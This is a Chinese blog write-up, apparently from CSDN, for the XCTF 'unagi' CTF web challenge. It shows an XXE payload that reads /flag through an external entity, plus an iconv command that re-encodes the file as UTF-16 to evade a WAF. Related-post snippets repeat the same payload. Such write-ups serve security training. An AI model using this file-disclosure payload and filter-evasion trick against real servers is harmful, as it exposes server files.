xctf攻防世界unagi wp

最新推荐文章于 2021-09-09 15:31:44 发布
最新推荐文章于 2021-09-09 15:31:44 发布
阅读量587 收藏
点赞数 1
分类专栏: CTF writeup 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46676743/article/details/113867990
版权
CTF 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
writeup
12 篇文章 0 订阅
订阅专栏

xctf攻防世界unagi wp

在这里插入图片描述
访问题目地址
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
点击Upload下的here
在这里插入图片描述
从信息提示中可以知道要通过编写xml文件上传
即通过XXE编码转换成utf-16编码绕过
可以利用vim编辑xml文件(取名为2.xml)代码如下:
在这里插入图片描述

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

执行转换命令

iconv -f utf8 -t utf-16 2.xml>1.xml

在这里插入图片描述
将1.xml上传到upload,拿到flag
在这里插入图片描述

sash1mi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
BUUCTF--[CSAWQual 2019]Web_Unagi
qq_46263951的博客
07-22 321
进入页面后看到一个Upload 看到给出的提示是让我们上传一个XML文件,刚好今天做了一个关于XML的XXE漏洞的题,底下贴链接,漏洞点为 给出提示flag在/flag中,所以构造出的payload为 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <userna.
BUUCTF:[CSAWQual 2019]Web_Unagi
末初的CSDN博客
04-06 1907
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
攻防世界web解题[进阶](六)
weixin_46703850的博客
03-10 590
攻防世界web解题[进阶](六)
BUUCTF [CSAWQual 2019]Web_Unagi 1
weixin_45642610的博客
09-09 521
BUUCTF [CSAWQual 2019]Web_Unagi 1 提示在/flag 有提示了上传xml文件及其格式 直接用之前xml注入的上传即可。 改文件名为1.xml上传即可得flag <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>&xx
XCTF Web 记录(unagi
ximo的博客
03-09 351
unagi 打开页面,四个跳转。 一个提示页面: 一个利用方式提示: 一个利用点: 利用方式: XXE注入。 构造XXE注入代码: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <pa
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
攻防世界 web高手进阶区 5分题 unagi
闵行小鱼塘
04-12 465
攻防世界web高手进阶区的5分题,本篇是unagi的writeup
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
攻防世界 web高级 leaking
beihai2013
01-18 683
考察:node.js逃逸 参考: https://blog.csdn.net/weixin_44037296/article/details/112387663 https://blog.csdn.net/weixin_46676743/article/details/112669105 不知道咋说,直接抄源码 # encoding=utf-8 import requests import time url = 'http://220.249.52.134:41148/?data=Buffer(500)'
CSAW2017_CTF_Web_Writeup
dengzhasong7076的博客
09-18 265
前言 还比较忙,还有题目得明天跟一下。 orange 系列 v1 http://web.chal.csaw.io:7311/?path=orange.txt v3 http://web.chal.csaw.io:7312/?path=orange.txt 说实话是比较迷的,因为有意外解,导致他开始是400分,后面变成100分,最后出v3版本才是300分。 不过考点是nodejs常用的一个...
xctf攻防世界smarthacker wp
sash1mi
02-19 438
xctf攻防世界smarthacker wp 考察知识点:源码泄露 python脚本 访问题目地址 下载www.tar.gz 我直呼好家伙,三千多个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,猜测这几千个php文件中肯定含有可以使用的shell,只有写脚本去试了 掏出脚本: import requests import os import re import threading import time requests.adapters.DEFAULT_
xxe编码绕过(8-19)
Realiy的博客
08-19 1674
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
安恒暑期培训8-2wp
jojohacker的博客
09-27 258
[CSAWQual 2019]Web_Unagi 发现upload里面有个here的超链接,点进去打开源码发现 根据四个提示,可以猜测是要我们构造一个xml的文件然后将XXE编码转码为UTF-16来上传,所以构造一个payload <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <
安恒6月赛逆向WP
re1wn
08-15 5958
安恒6月赛逆向WP
攻防世界traffic
最新发布
07-28
很抱歉,我无法理解你的问题。请提供更多的上下文或明确的问题,以便我能够帮助你。 #### 引用[.reference_title] - *1* *2* [xctf攻防世界 Web高手进阶区 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [攻防世界1](https://blog.csdn.net/charon145/article/details/121129480)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值